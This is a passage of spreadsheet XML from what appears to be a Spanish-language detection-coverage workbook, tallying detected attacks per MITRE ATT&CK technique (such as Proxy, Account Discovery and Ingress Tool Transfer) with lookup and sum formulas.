      <c r="AQ19" s="292"/>
      <c r="AR19" s="322"/>
      <c r="AS19" s="322"/>
      <c r="AT19" s="12"/>
      <c r="AU19" s="13"/>
      <c r="AV19" s="394"/>
      <c r="AW19" s="392"/>
      <c r="AX19" s="392"/>
      <c r="AY19" s="322"/>
      <c r="BA19" s="16"/>
      <c r="BB19" s="394"/>
      <c r="BC19" s="292"/>
      <c r="BD19" s="322"/>
      <c r="BE19" s="322"/>
      <c r="BF19" s="12"/>
      <c r="BG19" s="13"/>
      <c r="BH19" s="394"/>
      <c r="BI19" s="292">
        <v>0</v>
      </c>
      <c r="BJ19" s="322">
        <v>0</v>
      </c>
      <c r="BK19" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL19" s="12">
        <v>0</v>
      </c>
      <c r="BM19" s="13">
        <v>0</v>
      </c>
      <c r="BN19" s="394">
        <v>0</v>
      </c>
      <c r="BO19" s="292">
        <v>3</v>
      </c>
      <c r="BP19" s="322">
        <v>3</v>
      </c>
      <c r="BQ19" s="322" t="str">
        <f t="shared" si="1"/>
        <v>3 (3)</v>
      </c>
      <c r="BR19" s="12">
        <v>0</v>
      </c>
      <c r="BS19" s="12">
        <v>3</v>
      </c>
      <c r="BT19" s="13">
        <v>1</v>
      </c>
      <c r="BU19" s="394">
        <v>1</v>
      </c>
      <c r="BV19" s="292">
        <v>0</v>
      </c>
      <c r="BW19" s="322">
        <v>0</v>
      </c>
      <c r="BX19" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY19" s="12">
        <v>0</v>
      </c>
      <c r="BZ19" s="13">
        <v>0</v>
      </c>
      <c r="CA19" s="394">
        <v>0</v>
      </c>
      <c r="CB19" s="292">
        <v>0</v>
      </c>
      <c r="CC19" s="322">
        <v>0</v>
      </c>
      <c r="CD19" s="322" t="s">
        <v>4741</v>
      </c>
      <c r="CE19" s="12">
        <v>0</v>
      </c>
      <c r="CF19" s="12">
        <v>0</v>
      </c>
      <c r="CG19" s="13">
        <v>0</v>
      </c>
      <c r="CH19" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="20" spans="1:86" ht="15" customHeight="1">
      <c r="A20" s="4">
        <f t="shared" si="3"/>
        <v>18</v>
      </c>
      <c r="B20" s="4" t="str">
        <f>IFERROR(VLOOKUP(A20,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1071</v>
      </c>
      <c r="C20" s="493" t="str">
        <f>IFERROR(VLOOKUP(B20,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Application Layer Protocol</v>
      </c>
      <c r="D20" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B20)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E20" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>198</v>
      </c>
      <c r="F20" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (198)</v>
      </c>
      <c r="G20" s="292"/>
      <c r="H20" s="322"/>
      <c r="I20" s="322"/>
      <c r="J20" s="12"/>
      <c r="K20" s="13"/>
      <c r="L20" s="394"/>
      <c r="M20" s="322"/>
      <c r="N20" s="322"/>
      <c r="O20" s="322"/>
      <c r="P20" s="12"/>
      <c r="Q20" s="13"/>
      <c r="R20" s="394"/>
      <c r="S20" s="292"/>
      <c r="T20" s="322"/>
      <c r="U20" s="322"/>
      <c r="V20" s="12"/>
      <c r="W20" s="13"/>
      <c r="X20" s="394"/>
      <c r="Y20" s="392"/>
      <c r="Z20" s="392"/>
      <c r="AA20" s="322"/>
      <c r="AB20" s="392"/>
      <c r="AC20" s="16"/>
      <c r="AD20" s="394"/>
      <c r="AE20" s="392"/>
      <c r="AF20" s="392"/>
      <c r="AG20" s="322"/>
      <c r="AH20" s="392"/>
      <c r="AI20" s="16"/>
      <c r="AJ20" s="394"/>
      <c r="AK20" s="392"/>
      <c r="AL20" s="392"/>
      <c r="AM20" s="322"/>
      <c r="AN20" s="392"/>
      <c r="AO20" s="16"/>
      <c r="AP20" s="394"/>
      <c r="AQ20" s="292"/>
      <c r="AR20" s="322"/>
      <c r="AS20" s="322"/>
      <c r="AT20" s="12"/>
      <c r="AU20" s="13"/>
      <c r="AV20" s="394"/>
      <c r="AW20" s="392"/>
      <c r="AX20" s="392"/>
      <c r="AY20" s="322"/>
      <c r="BA20" s="16"/>
      <c r="BB20" s="394"/>
      <c r="BC20" s="292"/>
      <c r="BD20" s="322"/>
      <c r="BE20" s="322"/>
      <c r="BF20" s="12"/>
      <c r="BG20" s="13"/>
      <c r="BH20" s="394"/>
      <c r="BI20" s="292">
        <v>0</v>
      </c>
      <c r="BJ20" s="322">
        <v>0</v>
      </c>
      <c r="BK20" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL20" s="12">
        <v>0</v>
      </c>
      <c r="BM20" s="13">
        <v>0</v>
      </c>
      <c r="BN20" s="394">
        <v>0</v>
      </c>
      <c r="BO20" s="292">
        <v>198</v>
      </c>
      <c r="BP20" s="322">
        <v>198</v>
      </c>
      <c r="BQ20" s="322" t="str">
        <f t="shared" si="1"/>
        <v>198 (198)</v>
      </c>
      <c r="BR20" s="12">
        <v>0</v>
      </c>
      <c r="BS20" s="12">
        <v>2</v>
      </c>
      <c r="BT20" s="13">
        <v>1</v>
      </c>
      <c r="BU20" s="394">
        <v>198</v>
      </c>
      <c r="BV20" s="292">
        <v>0</v>
      </c>
      <c r="BW20" s="322">
        <v>0</v>
      </c>
      <c r="BX20" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY20" s="12">
        <v>0</v>
      </c>
      <c r="BZ20" s="13">
        <v>0</v>
      </c>
      <c r="CA20" s="394">
        <v>0</v>
      </c>
      <c r="CB20" s="292">
        <v>0</v>
      </c>
      <c r="CC20" s="322">
        <v>0</v>
      </c>
      <c r="CD20" s="322" t="s">
        <v>4741</v>
      </c>
      <c r="CE20" s="12">
        <v>0</v>
      </c>
      <c r="CF20" s="12">
        <v>0</v>
      </c>
      <c r="CG20" s="13">
        <v>0</v>
      </c>
      <c r="CH20" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="21" spans="1:86" ht="15" customHeight="1">
      <c r="A21" s="4">
        <f t="shared" si="3"/>
        <v>19</v>
      </c>
      <c r="B21" s="4" t="str">
        <f>IFERROR(VLOOKUP(A21,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1087</v>
      </c>
      <c r="C21" s="493" t="str">
        <f>IFERROR(VLOOKUP(B21,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Account Discovery</v>
      </c>
      <c r="D21" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B21)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E21" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F21" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (2)</v>
      </c>
      <c r="G21" s="292"/>
      <c r="H21" s="322"/>
      <c r="I21" s="322"/>
      <c r="J21" s="12"/>
      <c r="K21" s="13"/>
      <c r="L21" s="394"/>
      <c r="M21" s="322"/>
      <c r="N21" s="322"/>
      <c r="O21" s="322"/>
      <c r="P21" s="12"/>
      <c r="Q21" s="13"/>
      <c r="R21" s="394"/>
      <c r="S21" s="292"/>
      <c r="T21" s="322"/>
      <c r="U21" s="322"/>
      <c r="V21" s="12"/>
      <c r="W21" s="13"/>
      <c r="X21" s="394"/>
      <c r="Y21" s="392"/>
      <c r="Z21" s="392"/>
      <c r="AA21" s="322"/>
      <c r="AB21" s="392"/>
      <c r="AC21" s="16"/>
      <c r="AD21" s="394"/>
      <c r="AE21" s="392"/>
      <c r="AF21" s="392"/>
      <c r="AG21" s="322"/>
      <c r="AH21" s="392"/>
      <c r="AI21" s="16"/>
      <c r="AJ21" s="394"/>
      <c r="AK21" s="392"/>
      <c r="AL21" s="392"/>
      <c r="AM21" s="322"/>
      <c r="AN21" s="392"/>
      <c r="AO21" s="16"/>
      <c r="AP21" s="394"/>
      <c r="AQ21" s="292"/>
      <c r="AR21" s="322"/>
      <c r="AS21" s="322"/>
      <c r="AT21" s="12"/>
      <c r="AU21" s="13"/>
      <c r="AV21" s="394"/>
      <c r="AW21" s="392"/>
      <c r="AX21" s="392"/>
      <c r="AY21" s="322"/>
      <c r="BA21" s="16"/>
      <c r="BB21" s="394"/>
      <c r="BC21" s="292"/>
      <c r="BD21" s="322"/>
      <c r="BE21" s="322"/>
      <c r="BF21" s="12"/>
      <c r="BG21" s="13"/>
      <c r="BH21" s="394"/>
      <c r="BI21" s="292">
        <v>2</v>
      </c>
      <c r="BJ21" s="322">
        <v>2</v>
      </c>
      <c r="BK21" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (2)</v>
      </c>
      <c r="BL21" s="12">
        <v>1</v>
      </c>
      <c r="BM21" s="13">
        <v>1</v>
      </c>
      <c r="BN21" s="394">
        <v>2</v>
      </c>
      <c r="BO21" s="292">
        <v>2</v>
      </c>
      <c r="BP21" s="322">
        <v>2</v>
      </c>
      <c r="BQ21" s="322" t="str">
        <f t="shared" si="1"/>
        <v>2 (2)</v>
      </c>
      <c r="BR21" s="12">
        <v>1</v>
      </c>
      <c r="BS21" s="12">
        <v>0</v>
      </c>
      <c r="BT21" s="13">
        <v>1</v>
      </c>
      <c r="BU21" s="394">
        <v>2</v>
      </c>
      <c r="BV21" s="292">
        <v>0</v>
      </c>
      <c r="BW21" s="322">
        <v>0</v>
      </c>
      <c r="BX21" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY21" s="12">
        <v>0</v>
      </c>
      <c r="BZ21" s="13">
        <v>0</v>
      </c>
      <c r="CA21" s="394">
        <v>0</v>
      </c>
      <c r="CB21" s="292">
        <v>0</v>
      </c>
      <c r="CC21" s="322">
        <v>0</v>
      </c>
      <c r="CD21" s="322" t="s">
        <v>4741</v>
      </c>
      <c r="CE21" s="12">
        <v>0</v>
      </c>
      <c r="CF21" s="12">
        <v>0</v>
      </c>
      <c r="CG21" s="13">
        <v>0</v>
      </c>
      <c r="CH21" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="1:86" ht="15" customHeight="1">
      <c r="A22" s="4">
        <f t="shared" si="3"/>
        <v>20</v>
      </c>
      <c r="B22" s="4" t="str">
        <f>IFERROR(VLOOKUP(A22,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1090</v>
      </c>
      <c r="C22" s="493" t="str">
        <f>IFERROR(VLOOKUP(B22,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Proxy</v>
      </c>
      <c r="D22" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B22)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E22" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>23</v>
      </c>
      <c r="F22" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (23)</v>
      </c>
      <c r="G22" s="292"/>
      <c r="H22" s="322"/>
      <c r="I22" s="322"/>
      <c r="J22" s="12"/>
      <c r="K22" s="13"/>
      <c r="L22" s="394"/>
      <c r="M22" s="322"/>
      <c r="N22" s="322"/>
      <c r="O22" s="322"/>
      <c r="P22" s="12"/>
      <c r="Q22" s="13"/>
      <c r="R22" s="394"/>
      <c r="S22" s="292"/>
      <c r="T22" s="322"/>
      <c r="U22" s="322"/>
      <c r="V22" s="12"/>
      <c r="W22" s="13"/>
      <c r="X22" s="394"/>
      <c r="Y22" s="392"/>
      <c r="Z22" s="392"/>
      <c r="AA22" s="322"/>
      <c r="AB22" s="392"/>
      <c r="AC22" s="16"/>
      <c r="AD22" s="394"/>
      <c r="AE22" s="392"/>
      <c r="AF22" s="392"/>
      <c r="AG22" s="322"/>
      <c r="AH22" s="392"/>
      <c r="AI22" s="16"/>
      <c r="AJ22" s="394"/>
      <c r="AK22" s="392"/>
      <c r="AL22" s="392"/>
      <c r="AM22" s="322"/>
      <c r="AN22" s="392"/>
      <c r="AO22" s="16"/>
      <c r="AP22" s="394"/>
      <c r="AQ22" s="292"/>
      <c r="AR22" s="322"/>
      <c r="AS22" s="322"/>
      <c r="AT22" s="12"/>
      <c r="AU22" s="13"/>
      <c r="AV22" s="394"/>
      <c r="AW22" s="392"/>
      <c r="AX22" s="392"/>
      <c r="AY22" s="322"/>
      <c r="BA22" s="16"/>
      <c r="BB22" s="394"/>
      <c r="BC22" s="292"/>
      <c r="BD22" s="322"/>
      <c r="BE22" s="322"/>
      <c r="BF22" s="12"/>
      <c r="BG22" s="13"/>
      <c r="BH22" s="394"/>
      <c r="BI22" s="292">
        <v>0</v>
      </c>
      <c r="BJ22" s="322">
        <v>0</v>
      </c>
      <c r="BK22" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL22" s="12">
        <v>0</v>
      </c>
      <c r="BM22" s="13">
        <v>0</v>
      </c>
      <c r="BN22" s="394">
        <v>0</v>
      </c>
      <c r="BO22" s="292">
        <v>49</v>
      </c>
      <c r="BP22" s="322">
        <v>20</v>
      </c>
      <c r="BQ22" s="322" t="str">
        <f t="shared" si="1"/>
        <v>20 (49)</v>
      </c>
      <c r="BR22" s="12">
        <v>0</v>
      </c>
      <c r="BS22" s="12">
        <v>4</v>
      </c>
      <c r="BT22" s="13">
        <v>1</v>
      </c>
      <c r="BU22" s="394">
        <v>20</v>
      </c>
      <c r="BV22" s="292">
        <v>6</v>
      </c>
      <c r="BW22" s="322">
        <v>4</v>
      </c>
      <c r="BX22" s="322" t="str">
        <f t="shared" si="2"/>
        <v>4 (6)</v>
      </c>
      <c r="BY22" s="12">
        <v>1</v>
      </c>
      <c r="BZ22" s="13">
        <v>1</v>
      </c>
      <c r="CA22" s="394">
        <v>4</v>
      </c>
      <c r="CB22" s="292">
        <v>6</v>
      </c>
      <c r="CC22" s="322">
        <v>4</v>
      </c>
      <c r="CD22" s="322" t="s">
        <v>4785</v>
      </c>
      <c r="CE22" s="12">
        <v>1</v>
      </c>
      <c r="CF22" s="12">
        <v>0</v>
      </c>
      <c r="CG22" s="13">
        <v>1</v>
      </c>
      <c r="CH22" s="394">
        <v>4</v>
      </c>
    </row>
    <row r="23" spans="1:86" ht="15" customHeight="1">
      <c r="A23" s="4">
        <f t="shared" si="3"/>
        <v>21</v>
      </c>
      <c r="B23" s="4" t="str">
        <f>IFERROR(VLOOKUP(A23,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1095</v>
      </c>
      <c r="C23" s="493" t="str">
        <f>IFERROR(VLOOKUP(B23,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Non-Application Layer Protocol</v>
      </c>
      <c r="D23" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B23)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E23" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F23" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (2)</v>
      </c>
      <c r="G23" s="292"/>
      <c r="H23" s="322"/>
      <c r="I23" s="322"/>
      <c r="J23" s="12"/>
      <c r="K23" s="13"/>
      <c r="L23" s="394"/>
      <c r="M23" s="322"/>
      <c r="N23" s="322"/>
      <c r="O23" s="322"/>
      <c r="P23" s="12"/>
      <c r="Q23" s="13"/>
      <c r="R23" s="394"/>
      <c r="S23" s="292"/>
      <c r="T23" s="322"/>
      <c r="U23" s="322"/>
      <c r="V23" s="12"/>
      <c r="W23" s="13"/>
      <c r="X23" s="394"/>
      <c r="Y23" s="392"/>
      <c r="Z23" s="392"/>
      <c r="AA23" s="322"/>
      <c r="AB23" s="392"/>
      <c r="AC23" s="16"/>
      <c r="AD23" s="394"/>
      <c r="AE23" s="392"/>
      <c r="AF23" s="392"/>
      <c r="AG23" s="322"/>
      <c r="AH23" s="392"/>
      <c r="AI23" s="16"/>
      <c r="AJ23" s="394"/>
      <c r="AK23" s="392"/>
      <c r="AL23" s="392"/>
      <c r="AM23" s="322"/>
      <c r="AN23" s="392"/>
      <c r="AO23" s="16"/>
      <c r="AP23" s="394"/>
      <c r="AQ23" s="292"/>
      <c r="AR23" s="322"/>
      <c r="AS23" s="322"/>
      <c r="AT23" s="12"/>
      <c r="AU23" s="13"/>
      <c r="AV23" s="394"/>
      <c r="AW23" s="392"/>
      <c r="AX23" s="392"/>
      <c r="AY23" s="322"/>
      <c r="BA23" s="16"/>
      <c r="BB23" s="394"/>
      <c r="BC23" s="292"/>
      <c r="BD23" s="322"/>
      <c r="BE23" s="322"/>
      <c r="BF23" s="12"/>
      <c r="BG23" s="13"/>
      <c r="BH23" s="394"/>
      <c r="BI23" s="292">
        <v>0</v>
      </c>
      <c r="BJ23" s="322">
        <v>0</v>
      </c>
      <c r="BK23" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL23" s="12">
        <v>0</v>
      </c>
      <c r="BM23" s="13">
        <v>0</v>
      </c>
      <c r="BN23" s="394">
        <v>0</v>
      </c>
      <c r="BO23" s="292">
        <v>0</v>
      </c>
      <c r="BP23" s="322">
        <v>0</v>
      </c>
      <c r="BQ23" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="BR23" s="12">
        <v>0</v>
      </c>
      <c r="BS23" s="12">
        <v>0</v>
      </c>
      <c r="BT23" s="13">
        <v>0</v>
      </c>
      <c r="BU23" s="394">
        <v>0</v>
      </c>
      <c r="BV23" s="292">
        <v>2</v>
      </c>
      <c r="BW23" s="322">
        <v>2</v>
      </c>
      <c r="BX23" s="322" t="str">
        <f t="shared" si="2"/>
        <v>2 (2)</v>
      </c>
      <c r="BY23" s="12">
        <v>1</v>
      </c>
      <c r="BZ23" s="13">
        <v>1</v>
      </c>
      <c r="CA23" s="394">
        <v>2</v>
      </c>
      <c r="CB23" s="292">
        <v>2</v>
      </c>
      <c r="CC23" s="322">
        <v>2</v>
      </c>
      <c r="CD23" s="322" t="s">
        <v>4742</v>
      </c>
      <c r="CE23" s="12">
        <v>1</v>
      </c>
      <c r="CF23" s="12">
        <v>0</v>
      </c>
      <c r="CG23" s="13">
        <v>1</v>
      </c>
      <c r="CH23" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="24" spans="1:86" ht="15" customHeight="1">
      <c r="A24" s="4">
        <f t="shared" si="3"/>
        <v>22</v>
      </c>
      <c r="B24" s="4" t="str">
        <f>IFERROR(VLOOKUP(A24,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1102</v>
      </c>
      <c r="C24" s="493" t="str">
        <f>IFERROR(VLOOKUP(B24,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Web Service</v>
      </c>
      <c r="D24" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B24)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E24" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F24" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (2)</v>
      </c>
      <c r="G24" s="292"/>
      <c r="H24" s="322"/>
      <c r="I24" s="322"/>
      <c r="J24" s="12"/>
      <c r="K24" s="13"/>
      <c r="L24" s="394"/>
      <c r="M24" s="322"/>
      <c r="N24" s="322"/>
      <c r="O24" s="322"/>
      <c r="P24" s="12"/>
      <c r="Q24" s="13"/>
      <c r="R24" s="394"/>
      <c r="S24" s="292"/>
      <c r="T24" s="322"/>
      <c r="U24" s="322"/>
      <c r="V24" s="12"/>
      <c r="W24" s="13"/>
      <c r="X24" s="394"/>
      <c r="Y24" s="392"/>
      <c r="Z24" s="392"/>
      <c r="AA24" s="322"/>
      <c r="AB24" s="392"/>
      <c r="AC24" s="16"/>
      <c r="AD24" s="394"/>
      <c r="AE24" s="392"/>
      <c r="AF24" s="392"/>
      <c r="AG24" s="322"/>
      <c r="AH24" s="392"/>
      <c r="AI24" s="16"/>
      <c r="AJ24" s="394"/>
      <c r="AK24" s="392"/>
      <c r="AL24" s="392"/>
      <c r="AM24" s="322"/>
      <c r="AN24" s="392"/>
      <c r="AO24" s="16"/>
      <c r="AP24" s="394"/>
      <c r="AQ24" s="292"/>
      <c r="AR24" s="322"/>
      <c r="AS24" s="322"/>
      <c r="AT24" s="12"/>
      <c r="AU24" s="13"/>
      <c r="AV24" s="394"/>
      <c r="AW24" s="392"/>
      <c r="AX24" s="392"/>
      <c r="AY24" s="322"/>
      <c r="BA24" s="16"/>
      <c r="BB24" s="394"/>
      <c r="BC24" s="292"/>
      <c r="BD24" s="322"/>
      <c r="BE24" s="322"/>
      <c r="BF24" s="12"/>
      <c r="BG24" s="13"/>
      <c r="BH24" s="394"/>
      <c r="BI24" s="292">
        <v>0</v>
      </c>
      <c r="BJ24" s="322">
        <v>0</v>
      </c>
      <c r="BK24" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL24" s="12">
        <v>0</v>
      </c>
      <c r="BM24" s="13">
        <v>0</v>
      </c>
      <c r="BN24" s="394">
        <v>0</v>
      </c>
      <c r="BO24" s="292">
        <v>2</v>
      </c>
      <c r="BP24" s="322">
        <v>2</v>
      </c>
      <c r="BQ24" s="322" t="str">
        <f t="shared" si="1"/>
        <v>2 (2)</v>
      </c>
      <c r="BR24" s="12">
        <v>0</v>
      </c>
      <c r="BS24" s="12">
        <v>2</v>
      </c>
      <c r="BT24" s="13">
        <v>1</v>
      </c>
      <c r="BU24" s="394">
        <v>2</v>
      </c>
      <c r="BV24" s="292">
        <v>1</v>
      </c>
      <c r="BW24" s="322">
        <v>1</v>
      </c>
      <c r="BX24" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (1)</v>
      </c>
      <c r="BY24" s="12">
        <v>1</v>
      </c>
      <c r="BZ24" s="13">
        <v>1</v>
      </c>
      <c r="CA24" s="394">
        <v>1</v>
      </c>
      <c r="CB24" s="292">
        <v>1</v>
      </c>
      <c r="CC24" s="322">
        <v>1</v>
      </c>
      <c r="CD24" s="322" t="s">
        <v>2496</v>
      </c>
      <c r="CE24" s="12">
        <v>1</v>
      </c>
      <c r="CF24" s="12">
        <v>0</v>
      </c>
      <c r="CG24" s="13">
        <v>1</v>
      </c>
      <c r="CH24" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="25" spans="1:86" ht="15" customHeight="1">
      <c r="A25" s="4">
        <f t="shared" si="3"/>
        <v>23</v>
      </c>
      <c r="B25" s="4" t="str">
        <f>IFERROR(VLOOKUP(A25,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1104</v>
      </c>
      <c r="C25" s="493" t="str">
        <f>IFERROR(VLOOKUP(B25,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Multi-Stage Channels</v>
      </c>
      <c r="D25" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B25)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E25" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F25" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (1)</v>
      </c>
      <c r="G25" s="292"/>
      <c r="H25" s="322"/>
      <c r="I25" s="322"/>
      <c r="J25" s="12"/>
      <c r="K25" s="13"/>
      <c r="L25" s="394"/>
      <c r="M25" s="322"/>
      <c r="N25" s="322"/>
      <c r="O25" s="322"/>
      <c r="P25" s="12"/>
      <c r="Q25" s="13"/>
      <c r="R25" s="394"/>
      <c r="S25" s="292"/>
      <c r="T25" s="322"/>
      <c r="U25" s="322"/>
      <c r="V25" s="12"/>
      <c r="W25" s="13"/>
      <c r="X25" s="394"/>
      <c r="Y25" s="392"/>
      <c r="Z25" s="392"/>
      <c r="AA25" s="322"/>
      <c r="AB25" s="392"/>
      <c r="AC25" s="16"/>
      <c r="AD25" s="394"/>
      <c r="AE25" s="392"/>
      <c r="AF25" s="392"/>
      <c r="AG25" s="322"/>
      <c r="AH25" s="392"/>
      <c r="AI25" s="16"/>
      <c r="AJ25" s="394"/>
      <c r="AK25" s="392"/>
      <c r="AL25" s="392"/>
      <c r="AM25" s="322"/>
      <c r="AN25" s="392"/>
      <c r="AO25" s="16"/>
      <c r="AP25" s="394"/>
      <c r="AQ25" s="292"/>
      <c r="AR25" s="322"/>
      <c r="AS25" s="322"/>
      <c r="AT25" s="12"/>
      <c r="AU25" s="13"/>
      <c r="AV25" s="394"/>
      <c r="AW25" s="392"/>
      <c r="AX25" s="392"/>
      <c r="AY25" s="322"/>
      <c r="BA25" s="16"/>
      <c r="BB25" s="394"/>
      <c r="BC25" s="292"/>
      <c r="BD25" s="322"/>
      <c r="BE25" s="322"/>
      <c r="BF25" s="12"/>
      <c r="BG25" s="13"/>
      <c r="BH25" s="394"/>
      <c r="BI25" s="292">
        <v>0</v>
      </c>
      <c r="BJ25" s="322">
        <v>0</v>
      </c>
      <c r="BK25" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL25" s="12">
        <v>0</v>
      </c>
      <c r="BM25" s="13">
        <v>0</v>
      </c>
      <c r="BN25" s="394">
        <v>0</v>
      </c>
      <c r="BO25" s="292">
        <v>1</v>
      </c>
      <c r="BP25" s="322">
        <v>1</v>
      </c>
      <c r="BQ25" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="BR25" s="12">
        <v>0</v>
      </c>
      <c r="BS25" s="12">
        <v>1</v>
      </c>
      <c r="BT25" s="13">
        <v>1</v>
      </c>
      <c r="BU25" s="394">
        <v>1</v>
      </c>
      <c r="BV25" s="292">
        <v>1</v>
      </c>
      <c r="BW25" s="322">
        <v>1</v>
      </c>
      <c r="BX25" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (1)</v>
      </c>
      <c r="BY25" s="12">
        <v>1</v>
      </c>
      <c r="BZ25" s="13">
        <v>1</v>
      </c>
      <c r="CA25" s="394">
        <v>1</v>
      </c>
      <c r="CB25" s="292">
        <v>1</v>
      </c>
      <c r="CC25" s="322">
        <v>1</v>
      </c>
      <c r="CD25" s="322" t="s">
        <v>2496</v>
      </c>
      <c r="CE25" s="12">
        <v>1</v>
      </c>
      <c r="CF25" s="12">
        <v>0</v>
      </c>
      <c r="CG25" s="13">
        <v>1</v>
      </c>
      <c r="CH25" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="26" spans="1:86" ht="15" customHeight="1">
      <c r="A26" s="4">
        <f t="shared" si="3"/>
        <v>24</v>
      </c>
      <c r="B26" s="4" t="str">
        <f>IFERROR(VLOOKUP(A26,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1105</v>
      </c>
      <c r="C26" s="493" t="str">
        <f>IFERROR(VLOOKUP(B26,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Ingress Tool Transfer</v>
      </c>
      <c r="D26" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B26)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E26" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>7</v>
      </c>
      <c r="F26" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (7)</v>
      </c>
      <c r="G26" s="292"/>
      <c r="H26" s="322"/>
      <c r="I26" s="322"/>
      <c r="J26" s="12"/>
      <c r="K26" s="13"/>
      <c r="L26" s="394"/>
      <c r="M26" s="322"/>
      <c r="N26" s="322"/>
      <c r="O26" s="322"/>
      <c r="P26" s="12"/>
      <c r="Q26" s="13"/>
      <c r="R26" s="394"/>
      <c r="S26" s="292"/>
      <c r="T26" s="322"/>
      <c r="U26" s="322"/>
      <c r="V26" s="12"/>
